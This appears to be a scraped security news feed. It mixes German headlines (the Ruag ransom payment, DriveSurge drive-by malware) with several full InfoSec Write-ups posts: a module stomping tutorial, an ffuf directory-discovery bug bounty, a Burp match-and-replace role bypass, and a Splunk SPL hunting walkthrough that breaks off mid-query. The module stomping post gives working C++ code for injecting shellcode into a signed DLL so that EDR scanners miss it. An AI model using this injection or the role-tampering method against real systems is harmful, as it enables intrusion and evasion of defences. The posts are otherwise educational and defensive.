Sun, 07 Jun 2026 11:54:21 +0200

Die Lösegeldzahlung der Ruag an die Hackergruppe Akira sorgt für Kritik. Die Nationalräte Franz Grüter (SVP) und Gerhard Andrey (Grüne) fordern ...

Parlamentarier kritisieren Ruag und fordern Aufarbeitung - Nau.ch

Sun, 07 Jun 2026 13:09:48 +0200

Die Lösegeldzahlung der Ruag an Hacker sorgt im Bundeshaus für Kritik. Politiker aus verschiedenen Lagern fordern eine unabhängige Untersuchung.

Hacker-Gruppe SRG: Physische Infiltration und Erpressung in unter einer Stunde - BornCity

Sun, 07 Jun 2026 13:11:28 +0200

Kriminelle kombinieren zunehmend digitale Attacken mit persönlichem Eindringen. KI-gestützte Phishing-Versuche steigen massiv, während Unternehmen ...

Eine kräftige „Schlochsaitn“ beim Herzogenauracher Altstadtfest - NN.de

Sun, 07 Jun 2026 13:32:28 +0200

Herzogenaurach/Erlangen - Ein Riesenandrang herrschte beim Herzogenauracher Altstadtfest. Was begeisterte die Besucher am meisten?

DriveSurge-Angriffe: Cyberkriminelle kapern Webseiten - it-daily.net

Sun, 07 Jun 2026 14:08:41 +0200

Die Kampagne DriveSurge nutzt zTDS, FakeUpdates und Clipboard-Hijacking, um Besucher gekaperter Webseiten unbemerkt mit Schadsoftware zu ...

Microsoft muss wegen Zero-Day-Provokateur "Nightmare Eclipse" einen Rückzieher machen

Sun, 07 Jun 2026 14:15:23 +0200

Microsoft rückt von seinen rechtlichen Drohungen gegen den Hacker Nightmare Eclipse ab. Zuvor hatte es heftige Kritik aus der Branche an ...

Chinesische Hacker saßen 18 Monate unbemerkt in Microsoft 365 – Martin Cid Magazine DE

Sun, 07 Jun 2026 15:17:44 +0200

Eine mit China verbundene Spionagegruppe lebte anderthalb Jahre in Firmenkonten in der Cloud, indem sie Vertrauen stahl, statt einzubrechen.

Porno-Attacke in deutscher Kleinstadt - MSN

Sun, 07 Jun 2026 16:10:51 +0200

Die Polizei spricht von einem kuriosen Einsatz. Auf einem Bildschirm an einer Bushaltestelle sind plötzlich obszöne Bilder zu sehen.

Größte Cyberangriffe 2026: Datendiebstahl und Risiken - Zamin.uz

Sun, 07 Jun 2026 16:56:13 +0200

2026 zeigte, dass Cybersicherheit nicht mehr nur ein technisches Problem ist, sondern zum Kernstück der globalen Politik geworden…

Traueranzeige Erna Hacker, Floß - Oberpfalzecho

Sun, 07 Jun 2026 17:15:39 +0200

Begleitet durch: Bestattung Schmid - Neustadt/WN.

Schmölln: Porno-Attacke in Thüringer Kleinstadt – Polizei ermittelt - T-Online

Sun, 07 Jun 2026 17:23:58 +0200

Ein Hacker-Angriff steht im Raum. In der thüringischen 14.000-Einwohner-Kleinstadt Schmölln haben pornografische Aufnahmen einen Polizeieinsatz ...

Entgegen den Warnungen des Bundes: Ruag bezahlte Lösegeld an Hacker - Freiburger Nachrichten

Sun, 07 Jun 2026 17:25:29 +0200

Der Bundeskonzern RUAG hat nach einem Hacker-Angriff im vergangenen Herbst Lösegeld bezahlt. Dies berichtete das SRF am Samstag. Besonders brisant ...

Gemini-Sicherheitslücke: Hacker steuerten KI über WhatsApp-Nachrichten

Sun, 07 Jun 2026 17:31:35 +0200

Sicherheitsforscher deckten eine Gemini-Lücke auf, die Angreifern die Kontrolle über Gerätefunktionen via Chat-Benachrichtigungen ermöglichte.

Hacker greift Moodle an und erpresst Hochschule - it-daily.net

Sun, 07 Jun 2026 17:46:03 +0200

Die Universität des Saarlandes hat einen Cyberangriff bestätigt, der über 40.000 Nutzerprofile auf der Lernplattform Moodle kompromittierte.

Hacker George Hotz: KI-Agenten produzieren Fehler, die immer schwerer aufzuspüren sind

Sun, 07 Jun 2026 17:52:21 +0200

Der mittlerweile 36-Jährige wurde berühmt, als er mit 17 Jahren das iPhone hackte. Einige Zeit später veröffentlichte er einen Jailbreak für die PS3.

Security Affairs newsletter Round 580 by Pierluigi Paganini – INTERNATIONAL EDITION

Sun, 07 Jun 2026 16:39:23 +0200

A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. U.S. CISA adds SolarWinds Serv-U flaw to its Known Exploited Vulnerabilities catalog Report: Anthropic Deploys Engineers […]

An Introduction to Module Stomping

Sun, 07 Jun 2026 16:40:30 +0200

Overwriting DLLs for Windows Process InjectionBackgroundContextIn modern adversary emulation, generic process-injection techniques are closely scrutinized. Legacy approaches like cross-process thread creation with unbacked memory regions trigger immediate behavioral telemetry and get instantly popped by memory scanners.To bypass these hurdles, we need to slide past detection. Enter Module Stomping, a technique that involves overwriting the .text section of a loaded, signed DLL to hide our payload inside a disk-backed memory region.CHA CHA NOW YA’LLIn this post, I will outline the basic workflow and some common primitives used in module stomping for Windows process injection.ToolsAll module stomping code referenced in this post can be found in the ‘module-injection’ folder in my ‘windows-process-injection’ repository.GitHub - toneillcodes/windows-process-injection: A collection of techniques for process injection on WindowsSystemInformer can optionally be used to follow the workflow and will be covered in the example PoC section of this post.System InformerModule StompingWorkflow & PrimitivesThe following is an outline of a common module stomping workflow.Step One: Identify a target module or use LoadLibraryExA to load a ‘sacrificial’ module to serve as the stomping target.Step Two: Identify an address within the target module’s address space to write our buffer (typically by locating a specific exported function via GetProcAddress).Step Three: Write our buffer to the address from Step Two with WriteProcessMemory.Step Four: Create a new thread using the buffer address from Step Two with CreateThread.While this foundational workflow is completely functional, a stock implementation like this leaves a massive trail of Indicators of Compromise (IoCs). In the sections below, we’ll analyze how this basic approach trips modern defenses, and how we can modify the code to obscure both static and dynamic signatures.Proof-of-ConceptLocal StompingThe cleanest way to map out this tradecraft is by executing it within our current process context. This keeps our debugging loop simple and focuses purely on the memory manipulation itself. Let’s break down the core logic using the local-stomp.cpp source file from the ‘Windows Process Injection’ repository.First, we need to open a handle to the current process using OpenProcess.// Open a handle to the current processHANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(pid));if(pHandle == NULL) { printf("Failed to acquire process handle!\n"); return -1;}printf("[*] Successfully opened handle to PID: %u\n", pid);Now that we have a handle, we need to either locate or load the target module.For this demonstration, we’ll load wininet.dll; it’s fairly large and so it can accommodate testing different payloads. Using LoadLibraryExA is not always a good idea, but it is helpful for demonstrating the concept.// load sacrificial DLL, using wininet because it is fairly large and so it can accomodate different PoC payloadsHMODULE hSacrificialDll = LoadLibraryExA("wininet.dll", NULL, DONT_RESOLVE_DLL_REFERENCES);if (hSacrificialDll == NULL) { printf("[ERROR] Failed to obtain DLL handle! Error: %lu\n", GetLastError()); return -1;}printf("[*] Target DDL loaded.\n");We need to identify the .text section of the module. We can either locate the section itself or search the module for a specific function.For the sake of demonstration, we will leverage the GetProcAddresss function. We pass a handle to the module and the function name we want to locate, and it will return the address.LPVOID targetAddress = (LPVOID)GetProcAddress(hSacrificialDll, "CommitUrlCacheEntryW"); if (targetAddress == NULL) { printf("[ERROR] Failed to locate target function CommitUrlCacheEntryW! Error: %lu\n", GetLastError()); return -1;}printf("[*] Target wininet.dll!CommitUrlCacheEntryW located at: : 0x%016llx\n", targetAddress);Now that we have a target address, we can overwrite module code with our own buffer by using targetAddress as the destination parameter for WriteProcessMemory.// Write the shellcode to the block of memory that we allocated with VirtualAllocExBOOL writeShellcode = WriteProcessMemory(pHandle, targetAddress, buf, sizeof buf, NULL);if(writeShellcode == false) { printf("[ERROR] Failed to write shellcode! Using addresss: 0x%016llx, Error: %lu\n", targetAddress, GetLastError()); FreeLibrary(hSacrificialDll); return -1;}Finally, execute our buffer by creating a new thread, using the targetAddress value as the lpStartAddress parameter for CreateThread.// Create a new thread using the shellcode buffer address as the starting pointHANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)targetAddress, NULL, 0, NULL);if (tHandle == NULL) { printf("[ERROR] Failed to create thread within the process (PID: %u)! Error: %lu\n", pid, GetLastError()); FreeLibrary(hSacrificialDll); return -1;}CompileCompile the local-stomp.cpp example code and suppress warnings.windows-process-injection\module-stomping>cl.exe local-stomp.cpp /W0Microsoft (R) C/C++ Optimizing Compiler Version 19.16.27054 for x64Copyright (C) Microsoft Corporation. All rights reserved.local-stomp.cppMicrosoft (R) Incremental Linker Version 14.16.27054.0Copyright (C) Microsoft Corporation. All rights reserved./out:local-stomp.exelocal-stomp.objwindows-process-injection\module-stomping>Execute & ValidateThe PoC includes pauses to help track the workflow. In this example, we will use SystemInformer (previously ProcessHacker) to illustrate the process.Run local-stomp.exe and pause at the first prompt to openSystemInformer and locate the process using the PID from the output.windows-process-injection\module-stomping>local-stomp.exe[*] Running PI with target PID: 1100[*] Successfully opened handle to PID: 1100[*] Press Enter to load the sacrificial DLL: Double-click on the process from the list and, in the process Properties panel, open the ‘Modules’ tab. Note that at this point, only kernel32.dll and ntdll.dll have been loaded.Baseline modules for our simple executable.Back at the console, press Enter to resume the process and load the sacrificial DLL wininet.dll and locate the CommitUrlCacheEntryW function.windows-process-injection\module-stomping>local-stomp.exe[*] Running PI with target PID: 1100[*] Successfully opened handle to PID: 1100[*] Press Enter to load the sacrificial DLL: [*] Target DLL loaded.[*] Target wininet.dll!CommitUrlCacheEntryW located at: 0x00007ff917297f30[*] Press Enter to write the shellcode:In the console output, note the function’s address:0x00007ff917297f30. Back in SystemInformer, review the ‘Modules’ list. It should contain a new entry for wininet.dll.Refreshed module list shows the wininet.dll moduleSwitch to the ‘Memory’ tab in SystemInformer and sort by ‘Base Address’. Locate the .text section of the target module by looking for the section that contains the function address (hint: it should have a ‘Use’ value of ‘C:\Windows\System32\wininet.dll’ with RXprotection).Locating the .text section of wininet.dll based on propertiesRight-click and copy the ‘Base Address’ of this section. In this case, the address was 0x7ff917221000Subtract the function address from the section base to obtain the offset 0x00007ff917297f30 - 0x00007ff917221000 = 0x76F30Double-click the Memory entry to view the contents. When the window loads, click the ‘Go to…’ button and enter the offset found when subtracting the function from the module base RVA. (0x76F30). The code has not been tampered with and contains legitimate wininet.dll code.Baseline module code that has not been tampered withBack at the console, press ‘Enter’ to write the shellcode to the target address...[*] Target wininet.dll!CommitUrlCacheEntryW located at: 0x00007ff917297f30[*] Press Enter to write the shellcode: Back in SystemInformer, in the ‘Memory’ tab, click the ‘Re-read’ button to refresh the memory at the target address. It should now reflect the bytes from our buffer.Updated memory shows our payload bytes and the calc.exe stringPress ‘Enter’ one last time and confirm that the payload executes. Unless replaced, the shellcode is the Win32 calculator payload from Metasploit’s msfvenom....[*] Press Enter to write the shellcode: [*] Press Enter to execute the shellcode: [*] Waiting for the thread to return...[*] Process injection complete.windows-process-injection\module-stomping>Full execution resulting in a…calculator!ConclusionSummaryModule stomping successfully circumvents traditional allocation traps by hiding payloads directly within the .text section of legitimate DLLs.Module stomping is a valuable tool for Windows process injection.While highly functional as a baseline injection primitive, a vanilla implementation introduces secondary Indicators of Compromise (IoCs) via static imports and API strings.Modern EDR platforms and memory scanners don’t just look for unbacked memory; they actively perform verification checks to spot when a loaded module’s in-memory bytes deviate from its on-disk image.Next StepsEnhancementsWhile this foundational implementation gets our code running under the guise of a legitimate DLL, it leaves obvious footprints. In the next post, we will look at moving beyond basic local execution to explore:Remote Module Stomping: Orchestrating this dance inside a remote target process.Dynamic Function Resolution: Using PEB-walking techniques to reduce static IoCs and avoid highly scrutinized APIs.Targeted Stomping Workflow: Custom tooling to support a workflow for identifying the best target for module stomping operations.References“Module Stomping: Who up stompin they modules” by Dylan Tranhttps://dtsec.us/2023-11-04-ModuleStompin/SystemInformer by Winsider Seminars & Solutions, Inc.https://systeminformer.sourceforge.io/MSDN: OpenProcesshttps://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocessMSDN: LoadLibraryExAhttps://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexaMSDN: GetProcAddresshttps://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddressMSDN: CreateThreadhttps://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthreadAn Introduction to Module Stomping was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Sensitive Information Disclosure Through an Exposed File Repository.

Sun, 07 Jun 2026 16:40:50 +0200

By kjuliusIntroduction.One of the things I enjoy most about bug bounty hunting is how often seemingly minor findings turn into legitimate security issues. Sometimes you don’t need advanced exploitation techniques, complex chains, or zero-days. A simple directory discovery scan can reveal something that was never intended to be publicly accessible.In this article, I’ll walk through a finding that started with a routine content discovery exercise and ended with an accepted medium-severity vulnerability report and a bounty reward.Starting With a Single Subdomain.During a bug bounty assessment, I was exploring an in-scope subdomain belonging to the target program. Like I usually do when approaching a new asset, I began with basic reconnaissance and content discovery.There’s a reason experienced hunters spend so much time enumerating and fuzzing endpoints. Organizations often secure the applications everyone knows about, but forgotten directories, legacy services, and abandoned resources frequently slip through the cracks.For this target, I launched ffuf using a raft-medium-sized wordlist and let it do its thing.Command used.ffuf -u https://subdomain.target.com -w raft-medium-directory.txt -mc 200,301,302 -fs 0At first, the results looked fairly ordinary. Most of the responses were either expected directories or redirections. Then one particular endpoint caught my attention:/filesThe response size looked interesting enough to warrant a closer look.Proof of Concept Image.The Unexpected Discovery.Naturally, I opened the endpoint in my browser.Instead of receiving a 403 Forbidden response or being redirected to a login page, I was presented with something entirely different.A file repository.The page appeared to be powered by a secure, enterprise-grade remote access and control solution used by IT help desks and customer support teams, and displayed a list of files available for viewing and download. Executables, ZIP archives, configuration files, batch scripts, and other resources were all sitting there in plain sight.Proof of Concept Image.My first thought was simple:“Should this really be accessible to everyone?”The more I looked at it, the more unusual it seemed. This wasn’t a public download portal. It looked more like a support-related file store that had somehow ended up exposed to the internet.And perhaps most importantly, there was no authentication required.Anyone who discovered the endpoint could access it.Looking Beyond the Files.One mistake many researchers make is focusing only on whether they can find passwords, API keys, or other obvious secrets.While those findings are certainly impactful, information disclosure vulnerabilities often provide value in less direct ways.Even when files do not contain sensitive credentials, exposed repositories can reveal a surprising amount of information about an organization’s environment.Installers can reveal software in use.Configuration files can expose deployment details.Support resources can provide attackers with intelligence that helps them understand internal workflows.In some cases, such information can even be leveraged for social engineering attacks.From a security perspective, the bigger issue was not necessarily the contents of a specific file — it was the fact that a repository intended for a limited audience appeared to be publicly accessible.Putting Together the Report.After documenting the endpoint and gathering screenshots, I prepared a report explaining the exposure and its potential impact.The report focused on the lack of access controls surrounding the file store and the information disclosure risks associated with unrestricted access.I included:The vulnerable endpoint.Evidence showing public accessibility.Screenshots of the exposed file listing.A discussion of the security implications.Recommendations for restricting access.Once everything was documented, I submitted the report and waited.As every bug bounty hunter knows, that’s often the hardest part.The Verdict.A few days later, I received an update from the program.The report had been reviewed and validated.The security team agreed that the exposed file repository represented a legitimate security issue, and the finding was ultimately classified as a Medium Severity vulnerability.Proof of Concept Image.Even better, the report qualified for a bounty reward.Proof of Concept Image.Why This Finding MattersWhat makes this discovery memorable isn’t its technical complexity.There was no authentication bypass.No privilege escalation.No remote code execution.No elaborate vulnerability chain.Instead, the finding serves as a reminder that effective reconnaissance remains one of the most powerful skills in bug bounty hunting.Many researchers rush toward complex attack techniques while overlooking the basics. Yet time and time again, simple content discovery uncovers forgotten assets that organizations never intended to expose.Sometimes the difference between finding nothing and finding a valid vulnerability is simply taking the time to investigate an interesting response.Lessons Learned.This experience reinforced a few important lessons for me.First, never underestimate directory fuzzing. Even mature organizations can accidentally expose resources that should remain private.Second, don’t immediately dismiss information disclosure findings. Not every vulnerability needs to leak credentials to create risk.Third, when something feels out of place, investigate further. The /files endpoint could have easily been ignored as just another directory discovered during fuzzing.Instead, it turned out to be the source of a valid bug bounty report.Final Thoughts.Bug bounty hunting often rewards persistence more than complexity.This finding began with a single subdomain, a standard FFUF scan, and a bit of curiosity. What seemed like an ordinary directory discovery eventually became an accepted medium-severity report and a bounty payment.The next time you’re running content discovery against a target, remember that hidden directories are hidden for a reason. Most will lead nowhere. Some will lead to dead ends.And every once in a while, one of them will lead to a vulnerability worth reporting.💬 Before You Go.This finding is a reminder that effective reconnaissance doesn’t always require advanced techniques. Sometimes, a simple content discovery scan is enough to uncover assets that were never intended to be publicly accessible.The next time you’re fuzzing a target, don’t rush past an interesting response. Take a closer look, investigate further, and understand the context. Hidden directories often tell stories that the main application doesn’t.Thanks for reading. If you enjoyed this write-up, feel free to leave some claps👏, follow for more bug bounty stories, reconnaissance techniques, and real-world security findings. See you in the next writeup, peace… 🙏Sensitive Information Disclosure Through an Exposed File Repository. was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

I Became Admin on a CTF Platform

Sun, 07 Jun 2026 16:41:53 +0200

A few weeks ago I was poking around CTF platform. What I found was a pretty embarrassing vulnerability: any registered user could give themselves full admin access without knowing any admin credentials.What Was Actually HappeningWhen you log into the platform, the server sends back your account details including your role. Something like:{ "username": "hamza", "role": "participant"}This gets saved in browser’s sessionStorage. From that point on, every time you do anything on the platform load a page, submit a form, click a button the browser sends this role back to the server. And the server just... believes it. No verification against the database, no server-side session check, nothing. If your browser says you're an admin, the server treats you like one.This is a classic case of client-side role enforcement the application is trusting the client to tell it who you are, which is never a good idea.ReproductionTo exploit this I used Burp Suite to modify web traffic in real time.Setting Up the Match and Replace RulesBurp Suite has a feature called Match and Replace. Think of it like Find & Replace in Word, but it runs on live web traffic automatically. I set up four rules to cover all the places the role string could appear:Rule 1 — Response body:Field Value Type Response body Match participant Replace adminRule 2 — Request body:Field Value Type Request body Match participant Replace adminRule 3 — Response headers:Field Value Type Response header Match participant Replace adminRule 4 — Request headers:Field Value Type Request header Match participant Replace adminThen the same for request parameters — name and value both:End result — all rules active:Logging InWith those rules running, I logged in as a normal participant account. The server sends back "role": "participant", Burp silently flips it to "admin" before it hits the browser, the browser saves it, and from that point every request going back to the server carries the admin role.What Happened NextI navigated through the dashboard, profile pages, and challenge pages. Within a few requests the application started rendering the full admin panel.Full challenge management. I could edit or delete any existing room and upload new ones.The ImpactThis wasn’t just “oops, you can see an extra menu item.” Admin access on this platform means:Full user management — view, modify, or delete any account on the platformChallenge manipulation — create fake challenges, delete real ones, change scoresCertificate fraud — the platform issues certificates for completed challenges. An attacker could issue themselves (or anyone else) a certificate for work they never did. Every certificate the platform has issued now has a question mark over itVM control — admin can start and stop virtual machines for any user, meaning you could kill someone’s active session mid-challengeNo detection — because you’re using a legitimate account and only modifying traffic client-side, nothing unusual shows up in server logsRoot CauseThe application was storing the full user object including the role in sessionStorage and then reading that role back on every subsequent request to make authorization decisions. There was no server-side verification that the role being claimed actually matched what was in the database.The fix is straightforward:Never read role from client-supplied data. The server should derive the user’s identity from a secure, signed token (session cookie or JWT), then look up their actual role from the database on every request.Enforce access control server-side on every admin endpoint. If the role check doesn’t exist in your backend code, a frontend check is meaningless.Store only an opaque token in the browser. The client doesn’t need to know what your role is. Give it a random token that means nothing on its own, and let the server do the lookup.Closing ThoughtsBroken access control has sat at #1 on the OWASP Top 10 for years, and this is a textbook example of why. It’s not always some sophisticated exploit chain sometimes it’s just the server being too trusting about data it receives from the client.The issue was reported responsibly through official VDP.I Became Admin on a CTF Platform was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Splunk Exploring SPL: A Practical SOC Analyst Walkthrough for Search, Detection, and Threat Hunting

Sun, 07 Jun 2026 16:42:23 +0200

Hands-on Splunk SPL walkthrough covering searching, filtering, structuring, transforming, enrichment, and anomaly detection from a practical SOC analyst perspective.Cybersecurity | Splunk | SIEM | SPL | Threat Hunting | SOC AnalysisSecurity analysts deal with overwhelming amounts of telemetry every single day. Authentication logs, process executions, network events, registry modifications, suspicious scripts, everything eventually becomes part of the noise.Without the ability to efficiently search, filter, and transform that data, incident response becomes painful very quickly.That is where Splunk’s Search Processing Language (SPL) becomes incredibly powerful.In this walkthrough, I’ll document my practical exploration of the Splunk Exploring SPL TryHackMe lab while approaching it from a real-world SOC analyst perspective. Instead of simply solving flags, the focus here is understanding why each query matters and how similar workflows apply during actual investigations.We’ll cover:Search & Reporting fundamentalsSPL operators and filtering logicStructuring investigation timelinesTransforming noisy logs into actionable intelligenceThreat hunting using anomaly detectionPractical enrichment techniques for analystsLet’s jump in.Understanding Splunk Search & ReportingSplunk’s Search & Reporting App is where analysts spend most of their investigative time.Core interface components include:Search Head → Where SPL queries are writtenTime Picker → Controls investigation scopeSearch History → Useful for revisiting prior searchesData Summary → Quick overview of available hosts, sources, and sourcetypesIn a real SOC environment, selecting the wrong timeframe can completely distort findings. A suspicious event hidden in “All Time” may immediately stand out in a tighter investigation window.First Search: Exploring the DatasetThe first step is always understanding what data exists.Since this lab uses the windowslogs index, the natural starting point is a broad search.PAYLOADindex=windowslogsThis query tells Splunk:Search the windowslogs indexReturn every matching eventThink of an index like a structured data container holding a particular category of logs.The result:12256 total eventsThis immediately gives us situational awareness regarding investigation scale.Investigating the Fields SidebarOne of Splunk’s most useful reconnaissance tools is the Fields Sidebar.Instead of blindly guessing field names, it helps analysts inspect:parsed fieldsinteresting valuestop-occurring entriesnumeric fieldsstring-based fieldsevent distributionsThis becomes incredibly useful during exploratory threat hunting.For example, after loading the full dataset, we can inspect:More Fields → SourceIPto determine which source IP generated the highest activity.That revealed:172.90.12.11This kind of quick pivoting is common during triage investigations.Time-Bounded Event InvestigationTime filtering is one of the most important investigation skills in any SIEM.Instead of reviewing the entire dataset, the lab required narrowing the scope to:04/15/2022 from 08:05 AM to 08:06 AMThis returned:134 eventsA single minute of logs producing over a hundred events is a practical reminder of how noisy enterprise environments can become.Proper time scoping often makes the difference between efficient investigation and chaos.Search Operators in SPLSearching raw logs is useful, but the real strength of SPL comes from operators.Operators allow us to:compare valuescombine conditionsexclude noisesearch patternscreate precise hunting logicFree Text SearchA quick free-text search looks like this:PAYLOADindex=windowslogs aliceThis searches for the keyword:aliceacross the indexed events.Free-text searching is especially useful when:exact field names are unknownrapid exploratory hunting is neededIOC validation beginsThis is often the fastest first move during incident triage.Relational OperatorsSplunk supports relational operators such as:=!==These allow direct comparison-based filtering.A practical example is excluding noisy system-generated events.Filtering SYSTEM Account NoisePAYLOADindex=windowslogs AccountName!=SYSTEMThis query:searches all Windows logsexcludes events where AccountName = SYSTEMWhy this matters:SYSTEM accounts generate enormous amounts of legitimate telemetry.Filtering them helps analysts focus on human-driven activity, where suspicious behavior is usually easier to spot.Successful Authentication EventsWindows authentication investigations frequently begin with Event IDs.For successful logons:PAYLOADindex=windowslogs EventID=4624Event ID:4624 = Successful LogonThis returned:26 eventsThis query is directly relevant for:authentication investigationsbrute-force reviewcredential abuse analysislateral movement detectionLogical OperatorsSplunk also supports standard logical operators:ANDORNOTINThese allow multi-condition filtering.Investigating Specific Network ActivitySuppose we want to isolate traffic involving a particular host and service.PAYLOADindex=windowslogs DestinationIp=172.18.39.6 DestinationPort=135This filters events involving:destination IP: 172.18.39.6destination port: 135Returned:4 eventsWhy port 135 matters:Port 135 commonly relates to:RPC communicationWindows remote service interactionpotential lateral movement behaviorThat makes it interesting from a defender’s perspective.Host-Specific Source IP AnalysisNow let’s narrow activity further.PAYLOADindex=windowslogs Hostname=Salena.Adam DestinationIp=172.18.38.5| stats count by SourceIpBreakdown:First:index=windowslogs Hostname=Salena.Adam DestinationIp=172.18.38.5Filters events involving:host Salena.Adamdestination 172.18.38.5Then:| stats count by SourceIpGroups matching events by source IP and counts occurrences.This transforms raw logs into summarized intelligence.Highest result:172.90.12.11Wildcard SearchesWildcards become useful when exact values are unknown.Example:PAYLOADindex=windowslogs cyber*This searches for terms beginning with:cyberResult:12256 eventsMeaning the wildcard matched the full dataset scope here.Wildcards are useful for:IOC family matchingfilename huntingpartial string searchesprocess pattern discoveryOrder of Evaluation in SPLOne subtle but important SPL behavior:OR takes precedence over ANDExample:alice AND bob OR charlieSplunk evaluates this as:alice AND (bob OR charlie)This can dramatically alter results if misunderstood.The operator with the lowest priority:ANDParentheses should always be used for complex hunting logic.Filtering Results in SPLBy this point, we already know how quickly raw event streams become overwhelming.Enterprise environments generate massive telemetry continuously, and hunting for anomalies without filtering is basically self-inflicted suffering.This is where SPL filtering commands become essential.Rather than manually digging through thousands of events, we refine datasets step by step.The fields CommandThe fields command allows analysts to explicitly include or exclude fields from search results.This improves:readabilityinvestigation speedfocus during triageInstead of showing every extracted field, we only surface what matters.PAYLOADindex=windowslogs| fields Domain SourceProcessId TargetProcessIdBreakdown:index=windowslogsLoads the Windows event dataset.Then:| fields Domain SourceProcessId TargetProcessIdRestricts visible output to:DomainSourceProcessIdTargetProcessIdThis is incredibly useful when dealing with noisy event records containing dozens of irrelevant fields.Result:Highest SourceProcessId: 9496Why Process IDs MatterProcess IDs are highly useful in endpoint investigations.They help analysts:track parent-child execution relationshipsreconstruct process treesidentify suspicious process spawningcorrelate endpoint behaviorExample:If PowerShell launches cmd.exe, process relationships can reveal execution flow immediately.The regex CommandExact string matching is useful — but sometimes insufficient.This is where regular expressions become powerful.Splunk supports PCRE (Perl Compatible Regular Expressions), allowing pattern-based filtering.Registry Pattern MatchingIn this case, we wanted to locate registry-related objects ending with:ManagerPAYLOADindex=windowslogs| regex TargetObject="Manager$"Breakdown:TargetObject="Manager$"The $ symbol means:end of stringSo this query matches values whose final text is exactly:ManagerResult:HKLM\SOFTWARE\Microsoft\SecurityManagerThis is especially useful for:registry huntingpersistence investigationsmalware artifact analysisinconsistent string matchingStructuring Results for InvestigationFiltering reduces noise.Structuring improves readability.Raw logs are terrible for incident storytelling.Structured output helps analysts quickly understand event flow.The table CommandThe table command creates clean, readable output using only selected fields.This is one of the most useful commands during investigations.PAYLOADindex=windowslogs| table EventID AccountName AccountTypeThis displays only:EventIDAccountNameAccountTypeResult:First AccountName: SYSTEMThis is far cleaner than reading raw event blobs.Why Structured Tables MatterTables are useful for:timeline analysisinvestigation reportingstakeholder communicationcorrelation reviewA readable table is far more useful than scrolling raw XML-like event data.Reversing Timeline OrderSplunk usually displays newer events first.But sometimes investigations require chronological order.That’s where reverse helps.PAYLOADindex=windowslogs| table EventID AccountName AccountType| reverseThis flips event ordering.Result:First EventID: 800Why Chronological Reconstruction MattersAttack investigations often follow sequence.Example:Initial accessAuthenticationProcess executionCredential dumpingRegistry persistenceLateral movementChronology makes attack flow obvious.Timeline-Based Process InvestigationNow let’s investigate process execution history.PAYLOADindex=windowslogs EventID=1| table _time ParentProcessId ProcessId ParentCommandLine CommandLine| reverseBreakdown:EventID=1Focuses on process creation telemetry.Then:| tableStructures the output.Finally:| reverseShows oldest events first.Displayed fields:timestampparent process IDprocess IDparent command linechild command lineThis is excellent for reconstructing execution chains.Credential Discovery via Command-Line VisibilityDuring this timeline investigation, a credential appeared directly in process arguments.Discovered password:paw0rd1This is exactly why defenders love command-line logging.Attackers frequently expose:plaintext passwordsexecution argumentsmalicious scriptstool usageautomation commandsVisibility here can dramatically accelerate investigations.Transforming CommandsFiltering narrows datasets.Transforming commands summarize them.Instead of thousands of raw rows, transforming searches create:statisticstrendsranked outputsintelligence summariesCommon examples:topstatscharttimechartrareFrequency Analysis with topThe top command identifies frequently occurring field values.Useful for spotting dominant patterns.PAYLOADindex=windowslogs EventID=1| top ImageBreakdown:Focus on:EventID=1(process creation telemetry)Then:| top ImageReturns the most common executable image values.Result:C:\Windows\System32\BackgroundTransferHost.exeThis helps establish behavioral baselines.Why Frequency Analysis MattersNormal recurring binaries:explorer.exesvchost.exechrome.exePotentially suspicious recurring binaries:powershell.execmd.execertutil.exerundll32.exemshta.exeFrequency often reveals behavioral patterns quickly.Geolocation Enrichment with iplocationContext matters.IP addresses alone are not very informative.Splunk’s iplocation command enriches IP data with geographic metadata.PAYLOADindex=windowslogs| iplocation SourceIp| stats count by RegionBreakdown:| iplocation SourceIpEnriches IP addresses.Then:| stats count by RegionSummarizes event counts geographically.Result:CaliforniaGeolocation enrichment is useful for:suspicious foreign accessimpossible travel investigationscloud-origin traffic reviewVPN anomaly analysisRisk-Based Lookup EnrichmentExternal lookup tables add contextual intelligence.This is hugely valuable in production SOC environments.PAYLOADindex=windowslogs| lookup image_riskscore Image OUTPUT RiskScore| stats count by Image RiskScore| sort - RiskScoreBreakdown:| lookupMatches process image names against an external risk database.Then:| statsAggregates the results.Finally:| sort - RiskScoreShows highest-risk entries first.Result:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThis makes sense — PowerShell is frequently abused for offensive activity.Why Lookups Matter in Real SOC OperationsLookups commonly provide:IOC intelligencemalware reputationuser role contextasset classificationvulnerability severitybusiness criticality mappingWithout enrichment, logs are just raw data.With enrichment, they become actionable intelligence.Anomaly Detection with SPLNot every malicious event screams for attention.Some of the most interesting threats hide inside what initially appears to be legitimate activity.A valid VPN login. A known employee account. A familiar IP range. A routine process.This is why anomaly detection matters.Instead of asking:“Is this explicitly malicious?”we ask:“Is this behavior unusual?”That shift is where threat hunting becomes significantly more effective.Detecting Outliers by CountryImagine reviewing a VPN dataset containing thousands of login events.Each record contains:login timestampusernamesource IPsource countryAt first glance, nothing looks suspicious.But what if a user who always logs in from one region suddenly appears from a completely different country?That is exactly what we’re hunting for.PAYLOADindex=vpnlogs| eventstats count as logins_by_user by user| eventstats count as logins_by_user_country by user src_country| eval country_freq=logins_by_user_country/logins_by_user| where country_freq < 0.1| table _time user src_ip src_country country_freqLet’s break this down.Step 1: Count Total Logins Per User| eventstats count as logins_by_user by userThis calculates:Total login events per userExample:If user kbrown logged in 200 times:logins_by_user = 200Unlike stats, eventstats preserves raw events while appending calculated values.That makes it perfect for enrichment-style analysis.Step 2: Count User Logins Per Country| eventstats count as logins_by_user_country by user src_countryNow we calculate:How many times each user logged in from each countryExample:If kbrown logged in only once from Japan:logins_by_user_country = 1Step 3: Calculate Behavioral Frequency| eval 